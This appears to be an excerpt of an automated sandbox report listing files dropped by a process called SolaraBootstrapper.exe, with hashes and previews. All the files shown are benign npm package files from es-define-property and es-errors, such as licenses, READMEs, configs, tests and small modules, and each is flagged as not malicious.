                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/es-define-property.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with a single custom sponsorship URL.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):139
                                                  Entropy (8bit):4.461548676043605
                                                  Encrypted:false
                                                  SSDEEP:3:uFx3jG9UDHfa7aBA9c4RIeeFHqpvc9PNUaUifEIkHJ03WhBK:Kw9OfyFdRaB9LUiMIOJHhBK
                                                  MD5:D0104F79F0B4F03BBCD3B287FA04CF8C
                                                  SHA1:54F9D7ADF8943CB07F821435BB269EB4BA40CCC2
                                                  SHA-256:997785C50B0773E5E18BF15550FBF57823C634FEFE623CD37B3C83696402AD0A
                                                  SHA-512:DAF9B5445CFC02397F398ADFA0258F2489B70699DFEC6CA7E5B85AFE5671FDCABE59EDEE332F718F5E5778FEB1E301778DFFE93BB28C1C0914F669659BAD39C6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):822
                                                  Entropy (8bit):5.20488474386645
                                                  Encrypted:false
                                                  SSDEEP:12:ENOKyRmjXWTbp6p35SpHvNzmKv7myG7WzW2Ke1I9zfOdFnh5zKP21QAv:EIKpjXWTIppav75GZXGIiB+Cv
                                                  MD5:FF2C2EE466914D9A89D17056FDABFF87
                                                  SHA1:5A0683819C70CC38D791ACCA1C3C3E9623D582E7
                                                  SHA-256:FBB71F72CA81F11DA6ED63CB10E4D6086ADDE75A5C45069A326C490EC773AFD0
                                                  SHA-512:BE029C8E026C331515CABCE3D20EA687B68CC68E04391CA0D2C85E62BD4F975B84F522109EE892312828D3D0D4FB3446D2ABABA556ACB1E2F7AE48091DDBB50A
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## v1.0.0 - 2024-02-12..### Commits..- Initial implementation, tests, readme, types [`3e154e1`](https://github.com/ljharb/es-define-property/commit/3e154e11a2fee09127220f5e503bf2c0a31dd480).- Initial commit [`07d98de`](https://github.com/ljharb/es-define-property/commit/07d98de34a4dc31ff5e83a37c0c3f49e0d85cd50).- npm init [`c4eb634`](https://github.com/ljharb/es-define-property/commit/c4eb6348b0d3886aac36cef34ad2ee0665ea6f3e).- Only apps should have lockfiles [`7af86ec`](https://github.com/ljharb/es-define-property/commit/7af86ec1d311ec0b17fdfe616a25f64276903856).
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.101229758424099
                                                  Encrypted:false
                                                  SSDEEP:24:BPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:psaJHlxE3dQHOs5exm3ogFh
                                                  MD5:8FE23EA421AAF9F9D687709F6A6A09B7
                                                  SHA1:A47868AB90B532DF82ABE3E4F507BCB2EA441364
                                                  SHA-256:5E325595B4EA8CFEC3802F545B1DEF5D7B73E4A5B8E9BA63E32A320F67732292
                                                  SHA-512:8ACD3B84F3AFA8C6FF9C1A58AB774EA33AEC7701C022BA8F4D36218A8D1C03E80EF2EE1D692DBD43DBF5883153137C5E000F113B98DA23D870DFAB6F71B78AFA
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2024 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2056
                                                  Entropy (8bit):5.034867386998497
                                                  Encrypted:false
                                                  SSDEEP:24:Zdn1eI4IjAoqSTgMWvm64bHcauzK5g2HwoAruUo/suGCG9ZYIJ1heIXIjvRv:/1eI4I7qS8e6GH3hy2qudIL0IXIFv
                                                  MD5:1FD50C2701C3B616F8FDFF87E9D3AEAC
                                                  SHA1:17A3CA5DFF9C316F52B09F48D06ABD74B908A1D6
                                                  SHA-256:5CE564BB53FAFD87B543F144E04955D128199205CF07BFF442F3B875CA90D422
                                                  SHA-512:67915F0D9B60E1AC9CB037238E4B2D2C2DEC3EEA32BDB2F58E74397C82A0975A91B3833C4F8A89ADA22258CDBDAB9F8F01D7A7D811A3CFB8F43AA7C89899D07F
                                                  Malicious:false
                                                  Preview:# es-define-property <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..`Object.defineProperty`, but not IE 8's broken one...## Example..```js.const assert = require('assert');..const $defineProperty = require('es-define-property');..if ($defineProperty) {. assert.equal($defineProperty, Object.defineProperty);.} else if (Object.defineProperty) {. assert.equal($defineProperty, false, 'this is IE 8');.} else {. assert.equal($defineProperty, false, 'this is an ES3 engine');.}.```..## Tests.Simply clone the repo, `npm install`, and run `npm test`..## Security..Please email [@ljharb](https://github.com/ljharb) or see https://tidelift.com/security if you have a potential security vulnerability to report...[package-url]: https://npmjs.org/package/es-defin
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):93
                                                  Entropy (8bit):4.246163522417473
                                                  Encrypted:false
                                                  SSDEEP:3:n+F2fIqX8YToqFKeJqXlPBiEQ0IqX1:62fIDYTxeiEIw
                                                  MD5:83F6BF3823D12D8ED1424DF7A35A58F8
                                                  SHA1:B1B224DEA8E61930F427A3BEB9A5FC51E58024BF
                                                  SHA-256:26F10CC22A24B23DB7CD41FF339C907121EF7F518E0FE347B48A05F1BF0F7CBF
                                                  SHA-512:F53EE769E8481FF44A3F07950A20123CA53D176EF4CFA14794270FE091BFCE04B48871F193ADA22A23FE218BBDB71D0FEFC80C506631145899D37E0FB0C3D114
                                                  Malicious:false
                                                  Preview:declare const defineProperty: false | typeof Object.defineProperty;..export = defineProperty;
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):358
                                                  Entropy (8bit):4.9635670584718765
                                                  Encrypted:false
                                                  SSDEEP:6:QmRQgNMmBSVWKmBkMNos0b7WAdHmMNaM8zNJCqcWL9y1OKGIRBV3IYBDa:9RQt0UmOx3WAtUPBc+y1wADBO
                                                  MD5:B7BC620DD53AA6A7DD2EC301305117FE
                                                  SHA1:B9844CDED75ED1BC40675391ECA0BBC19DEDF42B
                                                  SHA-256:9C4B9A7EDAFEB02D872B9AD6258154311FD4F43CDF719E2DE736973C016219D9
                                                  SHA-512:8D92D968347FE07872F7E6C9081493B987D9C61E2D7FA27D6F0ACDB82F9A7BABC4B6AB8563ABB7964F67CE86C5DE47E803E81D8BD06F3BB455E12C2ABE5AD011
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('get-intrinsic');../** @type {import('.')} */.var $defineProperty = GetIntrinsic('%Object.defineProperty%', true) || false;.if ($defineProperty) {..try {...$defineProperty({}, 'a', { value: 1 });..} catch (e) {...// IE 8 has a broken defineProperty...$defineProperty = false;..}.}..module.exports = $defineProperty;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2112
                                                  Entropy (8bit):5.127618551632557
                                                  Encrypted:false
                                                  SSDEEP:48:R/SmRYCZUPagS4j0fzyRYsEg4K3WsdcbfhmfSowg:A1CS4B3K3WGfN
                                                  MD5:C4725FBA887A7FF0AC3858D435A1B240
                                                  SHA1:C507E0B1CF2597B64A19AF048A41DC1B02FD7FB9
                                                  SHA-256:987919FE29FF5DEBD1274B79E456265A64827269AD681313E845C8E646217EBC
                                                  SHA-512:531E6B03FFE25C6ACF0C6DD453D4C3756A17498018F1B493ACFD8D4253F00CF71052C4BDDEBA158BF927AFED286621C3E06C25121A27DC84E0ECA37630103D74
                                                  Malicious:false
                                                  Preview:{.."name": "es-define-property",.."version": "1.0.0",.."description": "`Object.defineProperty`, but not IE 8's broken one.",.."main": "index.js",.."types": "./index.d.ts",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."postlint": "tsc -p .",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/ljharb/es-define-prop
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1244
                                                  Entropy (8bit):4.942737590100003
                                                  Encrypted:false
                                                  SSDEEP:24:zj2fP4+l6f8DEatCnWk6I08uC15k6Y97ccDGRfEW:zj1AtCnW+yC15o9ZqREW
                                                  MD5:8B33AC3F76B3AD73E60EA886D97245E5
                                                  SHA1:DF572E1408CDF0A4BE5D1D6898837F82DA7233F1
                                                  SHA-256:643BE90198BAF64C2A766C7C373AE0BEBBF5F8717ED60D82437B5807CBDE1CA4
                                                  SHA-512:73B7F867FB282EAF9A847597E408741C7FEFBC96812499B71F7CC1E0994BCEB3B5AA153DD1CE0A429CC70A560B0345371F56F2BEB51E2D1840ADEBCCB32E5841
                                                  Malicious:false
                                                  Preview:'use strict';..var $defineProperty = require('../');..var test = require('tape');.var gOPD = require('gopd');..test('defineProperty: supported', { skip: !$defineProperty }, function (t) {..t.plan(4);...t.equal(typeof $defineProperty, 'function', 'defineProperty is supported');..if ($defineProperty && gOPD) { // this `if` check is just to shut TS up...var o = { a: 1 };....$defineProperty(o, 'b', { enumerable: true, value: 2 });...t.deepEqual(....gOPD(o, 'b'),....{.....configurable: false,.....enumerable: true,.....value: 2,.....writable: false....},....'property descriptor is as expected'...);....$defineProperty(o, 'c', { enumerable: false, value: 3, writable: true });...t.deepEqual(....gOPD(o, 'c'),....{.....configurable: false,.....enumerable: false,.....value: 3,.....writable: true....},....'property descriptor is as expected'...);..}...t.equal($defineProperty, Object.defineProperty, 'defineProperty is Object.defineProperty');...t.end();.});..test('defineProperty: not supported', { s
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3195
                                                  Entropy (8bit):4.736326326543835
                                                  Encrypted:false
                                                  SSDEEP:48:cj+2nTY8LdkWoltx4I8OjMGqoqZjuJGJkeGzJfYMT2s+Tmz:I+WWtx4ITjDqoql+Ok3AMqs+Tmz
                                                  MD5:D8A043C42FC4D89057F4DD4BE72C3EA9
                                                  SHA1:47D00B1A54AFD2080104036E09A565C8F9F670DF
                                                  SHA-256:55D3CA9EE2A017D8D9A969C47FD7623B4619CDD29010B5CDECBF7C88B42D23A7
                                                  SHA-512:C9966A66202E6F816AE76A855B0E116E2E1C09C2D81BD42D940B3464467E526DE85AD0F2DB320DBB5FDEDA6793B750E2D445F7510C743031FB3BF13D94441B42
                                                  Malicious:false
                                                  Preview:{.."compilerOptions": {.../* Visit https://aka.ms/tsconfig.json to read more about this file */..../* Projects */..../* Language and Environment */..."target": "es2022",................./* Set the JavaScript language version for emitted JavaScript and include compatible library declarations. */...// "lib": [],..................../* Specify a set of bundled library declaration files that describe the target runtime environment. */...// "noLib": true,................../* Disable including any library files, including the default lib.d.ts. */..."useDefineForClassFields": true,.......... /* Emit ECMAScript-standard-compliant class fields. */...// "moduleDetection": "auto",............/* Control what method is used to detect module-format JS files. */..../* Modules */..."module": "commonjs",................/* Specify what module code is generated. */...// "rootDir": "./",................./* Specify the root folder within your source files. */...// "moduleResolution": "node",........... /* S
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):43
                                                  Entropy (8bit):4.231286196905489
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hg:ExL0UA
                                                  MD5:C28B0FE9BE6E306CC2AD30FE00E3DB10
                                                  SHA1:AF79C81BD61C9A937FCA18425DD84CDF8317C8B9
                                                  SHA-256:0694050195FC694C5846B0A2A66B437AC775DA988F0A779C55FB892597F7F641
                                                  SHA-512:E3ECA17804522FFA4F41E836E76E397A310A20E8261A38115B67E8B644444153039D04198FB470F45BE2997D2C7A72B15BD4771A02C741B3CBC072EA6EF432E9
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):555
                                                  Entropy (8bit):4.598154648044777
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMrnplgM01bZBgMoGbQjgMy9gMLzgMT:qoQWAg0g+H0mgOlg7g1GegJ9gEzgs
                                                  MD5:37AE5D0FAB969F9F8C92B853CFAA1501
                                                  SHA1:99ACF15E50F39182C08F88DDEB4DCE2B3BCCF07A
                                                  SHA-256:5CFFDEEEE604FDF21F64369BF526C2C707377F01FDF1D816B204422CDE144CE9
                                                  SHA-512:05EBE90B56F4E19B2904F92516F73679B8959FE8419A693644C9268BBA16AD14648AD871F4F7FE1B5A258FDB727FCCEE888A6A0F0D73581713A0D666481BBC05
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/es-errors.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with a single custom sponsorship URL.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1833
                                                  Entropy (8bit):5.305276854847369
                                                  Encrypted:false
                                                  SSDEEP:24:EIKpjXWTIppzi9CQDGibZqaksPEXvdui/HCG9XHJoBkh5sJCnu:E5yEpw9CQaiNqfssXv9C6HXu
                                                  MD5:BEBCA175C8B27C2384C047D436940C97
                                                  SHA1:13FE14B3BEF08F16B534896D29160119583704D1
                                                  SHA-256:F21CE3B58B9C00181C38429F5F5F07438675FB519C749E4CC9EDD7C661A00DAF
                                                  SHA-512:E9CB670C6EC090245D2C76C2CF0CBF6E0B674FA9D730EB1780E329D3A3BDB4295DB3D323B06F5AB636F89EAC56A74AC56BE892A73E0C3A924AF0BB267A8EDC67
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.3.0](https://github.com/ljharb/es-errors/compare/v1.2.1...v1.3.0) - 2024-02-05..### Commits..- [New] add `EvalError` and `URIError` [`1927627`](https://github.com/ljharb/es-errors/commit/1927627ba68cb6c829d307231376c967db53acdf)..## [v1.2.1](https://github.com/ljharb/es-errors/compare/v1.2.0...v1.2.1) - 2024-02-04..### Commits..- [Fix] add missing `exports` entry [`5bb5f28`](https://github.com/ljharb/es-errors/commit/5bb5f280f98922701109d6ebb82eea2257cecc7e)..## [v1.2.0](https://github.com/ljharb/es-errors/compare/v1.1.0...v1.2.0) - 2024-02-04..### Commits..- [New] add `ReferenceError` [`6d8cf5b`](https://github.com/ljharb/es-errors/commit/6d8cf5bbb6f3f598d02cf6f30e468ba2caa8e143)..## [v1.1.0](https://github.com/ljharb/es-errors/co
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.101229758424099
                                                  Encrypted:false
                                                  SSDEEP:24:BPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:psaJHlxE3dQHOs5exm3ogFh
                                                  MD5:8FE23EA421AAF9F9D687709F6A6A09B7
                                                  SHA1:A47868AB90B532DF82ABE3E4F507BCB2EA441364
                                                  SHA-256:5E325595B4EA8CFEC3802F545B1DEF5D7B73E4A5B8E9BA63E32A320F67732292
                                                  SHA-512:8ACD3B84F3AFA8C6FF9C1A58AB774EA33AEC7701C022BA8F4D36218A8D1C03E80EF2EE1D692DBD43DBF5883153137C5E000F113B98DA23D870DFAB6F71B78AFA
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2024 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2114
                                                  Entropy (8bit):5.040337627766631
                                                  Encrypted:false
                                                  SSDEEP:48:51eI4I7qSTaACc/WEGH3vu+cmIEIL0I7Idv:TXFeSGvc/SXgLxMt
                                                  MD5:539D6F055ADF72086ED5AC03531E0433
                                                  SHA1:778FC234148953463040855B1111ED9CC295D030
                                                  SHA-256:176EC91DB928C929508ABF9917EBC35DD66E5EA1A989AC3E7AB290496D32C0D6
                                                  SHA-512:C3A68D2C584930FF19CCA0E85DE9BCEAA7CE1F9F99159663C94203137EFF8E85DB1FB5E6F38B037B02C7A4C3FAD9D9FAB3570977B986A03F0AEEC3D47B3F84F5
                                                  Malicious:false
                                                  Preview:# es-errors <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..A simple cache for a few of the JS Error constructors...## Example..```js.const assert = require('assert');..const Base = require('es-errors');.const Eval = require('es-errors/eval');.const Range = require('es-errors/range');.const Ref = require('es-errors/ref');.const Syntax = require('es-errors/syntax');.const Type = require('es-errors/type');.const URI = require('es-errors/uri');..assert.equal(Base, Error);.assert.equal(Eval, EvalError);.assert.equal(Range, RangeError);.assert.equal(Ref, ReferenceError);.assert.equal(Syntax, SyntaxError);.assert.equal(Type, TypeError);.assert.equal(URI, URIError);.```..## Tests.Simply clone the repo, `npm install`, and run `npm test`..## Security..Please emai
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):68
                                                  Entropy (8bit):3.971342748931882
                                                  Encrypted:false
                                                  SSDEEP:3:n+FVLfFF4MewaBiLevn:6FfFF44giLw
                                                  MD5:52771F1E8BFADED24362A7069F8ED74D
                                                  SHA1:DC1291CD0BB8D036793E5E2A65264348740C55FE
                                                  SHA-256:82E8FDE67D906608C18EDE0EE67F0EC2221E13FB7DE1576F9FC59E91158DE2E6
                                                  SHA-512:CA1D75019390C53A5BEB8D183FFD115D626E89B11AC3DBAE012A21F66477DAB2D9BD477D73ABC91924774D0C81B618E175191FBF6CAE297D5404C2F9A65A4B81
                                                  Malicious:false
                                                  Preview:declare const EvalError: EvalErrorConstructor;..export = EvalError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):75
                                                  Entropy (8bit):4.6553084442512835
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCk783zBbpBevn:QQCVn0zB9Bw
                                                  MD5:1E89F5B29003F4EDB43DF2DD17D42317
                                                  SHA1:3DEDECC34D8C8EC860E4C49E51051F60F4D87F82
                                                  SHA-256:D3161A97F162B483206E9849E41BB17FD54166810C76EBAA1DF068133E54CAAE
                                                  SHA-512:6EDAE4A2C632C3449EA3E3DF655E7666EEFEFA768B6CE1B8C6167618BDC87DC06DFF2F354FF138FEA0A96FE88C01BAD4E6FCCC41B3D2C22998029AD70EA55609
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./eval')} */.module.exports = EvalError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):56
                                                  Entropy (8bit):3.800455077891031
                                                  Encrypted:false
                                                  SSDEEP:3:n+FR8MewaBi9An:6R84gi9A
                                                  MD5:03F65FDBC4C19F3049A2F0602CD8F7B0
                                                  SHA1:B0453E246BB2655859407A005C03A1AE1CBF0555
                                                  SHA-256:032AF142C4E06FCD215E4519D4D1C9C60DBAA63D033CB116ABB5B5A4F6336FBF
                                                  SHA-512:98B84DCC4490AF51A7D80954E8989F6F7C6FF55AB31135FCBA21B07B14DC3B0ACB712151DE89D3F1D1E3C211605EFE2A017E71C73A996BA0B376DDBDDA5BF420
                                                  Malicious:false
                                                  Preview:declare const Error: ErrorConstructor;..export = Error;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):66
                                                  Entropy (8bit):4.515699377092075
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCd1Kv3zBbmKAn:QQCVWKfzBpA
                                                  MD5:F8EBBF637A1AB43A7188D855FDC7787B
                                                  SHA1:46D0FBBFFB2D11BBEF33B5C23FF2014F0F1B7ABE
                                                  SHA-256:28FEE350E89561019CF27EA37A313B4B4995F521FD087198FA235A8F135962DE
                                                  SHA-512:B44F3CD6CAD2E4D3A476BA898BF7D87525D42F013449A935A3DE92BEF973B925805A3FAA9C8C3832CD8BCF121AA9ECB5EFC552E165A5FF3C09D14FD5150C893A
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('.')} */.module.exports = Error;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2174
                                                  Entropy (8bit):5.126600934742982
                                                  Encrypted:false
                                                  SSDEEP:48:QmIiT5RYCC6aKCYZU547agKX0fTRYsEg4jbsdKSowCL:JkCC6aKCY9xA3jbzZ
                                                  MD5:7E6B784827A0AFF2A05C343F8A53E88D
                                                  SHA1:D13BCB37AB6AB7F0911CE728148CB1C8485A81D1
                                                  SHA-256:1A0A0BCCCC76B915CB64073317312840CF6363E9144B96F406D0059774DD5278
                                                  SHA-512:BA218CA690CA74F2E4FECA55F95AE3F1F792B4A067C3133B035265DE2E39CA39A8FDFC7FC18A898FF8CA0A5E2A791121D10708ED564496502DA824A6167292C7
                                                  Malicious:false
                                                  Preview:{.."name": "es-errors",.."version": "1.3.0",.."description": "A simple cache for a few of the JS Error constructors.",.."main": "index.js",.."exports": {...".": "./index.js",..."./eval": "./eval.js",..."./range": "./range.js",..."./ref": "./ref.js",..."./syntax": "./syntax.js",..."./type": "./type.js",..."./uri": "./uri.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."pretest": "npm run lint",..."test": "npm run tests-only",..."tests-only": "nyc tape 'test/**/*.js'",..."posttest": "aud --production",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."postlint": "tsc -p . && eclint check $(git ls-files | xargs find 2> /dev/null | grep -vE 'node_modules|\\.git' | grep -v dist/)",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog &&
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):71
                                                  Entropy (8bit):4.03339931310672
                                                  Encrypted:false
                                                  SSDEEP:3:n+FX60gHDMewaBiDFnn:6qT4gix
                                                  MD5:28AE6AACD62D72D38B235712EF2151A6
                                                  SHA1:79024865F4B0A771E30350C3910C034C966C076E
                                                  SHA-256:7AB8A9B5B7D60CD76C021039F87509F5A13BA0292A3984FB1381B4BA4D79C26C
                                                  SHA-512:51B4CF1751A6FE262BC312E89556CA88566661B54A1339E1A63473F9A8F980DDC6735835BE16117FD0E4C985DDDFA80E6805497D825AD21E74F8DAC52A8224D0
                                                  Malicious:false
                                                  Preview:declare const RangeError: RangeErrorConstructor;..export = RangeError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):77
                                                  Entropy (8bit):4.691458943991684
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCI2ACMx3zBbMCFnn:QQCVJ2IzB4Y
                                                  MD5:BC149F1F9A727B3CE635241092C84A55
                                                  SHA1:23E843A0476AB2BBE089589022CFA2EA627872DD
                                                  SHA-256:E376220F3A0226BD5B09B6D5A1411BBAC274DB8D2D9F7EB723142B7E676374BE
                                                  SHA-512:8218173C907EF499563AF1B33CCA5D8544E9EE602B632AAE42153DDD24ECD2334E87D3D5AA9D81CF97F11DE2CDE37E61229D062EF9A28E3E7D0FBEA0E1F16D7E
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./range')} */.module.exports = RangeError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):83
                                                  Entropy (8bit):3.8207810054386675
                                                  Encrypted:false
                                                  SSDEEP:3:n+FXAyASaXtwcXAyASaXmDMewaBidAyASaXwn:6Qyta9nQytaI4giCytaA
                                                  MD5:4E3274AD0F043B9C2B0B2C72AEBD34C8
                                                  SHA1:3C0481C511E71DB6ECC554F10242CAFB0C3D478A
                                                  SHA-256:C736BB4552777F1DBA23AA0152B8E41C20A09BBC02FCA1DDE4EA4D1180FEFB04
                                                  SHA-512:6F8E03F0F3362DF13B042EDD8595096A1BBA4A6F7512ECF9715CCBAF80122905F493F2BA708F2022E5EED9FBFA9CE01566AB91995C6A88E5F035AD8DF852C81A
                                                  Malicious:false
                                                  Preview:declare const ReferenceError: ReferenceErrorConstructor;..export = ReferenceError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.573802387412566
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCMe7P03zBbwyAyASaXwn:QQCVNe7PMzBETytaA
                                                  MD5:219B6E072AEBEB07620CC1FDDDF70185
                                                  SHA1:B86EA9E706E4C9DF6639D12E5F728ACB9B18EF72
                                                  SHA-256:31945F1740A0A2143FB8C38943AFC6CCE5DE5BA6FAB7AF42D17B7874A19A0900
                                                  SHA-512:9FB0646015B5421B7103AB86D16F97C042D94C2D566D189E8743B90EA9CA91D423A6A0B2CEE42BB603DC6E991BA8FC04ACF81B49650113B4260E641E3C354731
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./ref')} */.module.exports = ReferenceError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):74
                                                  Entropy (8bit):4.058679160135773
                                                  Encrypted:false
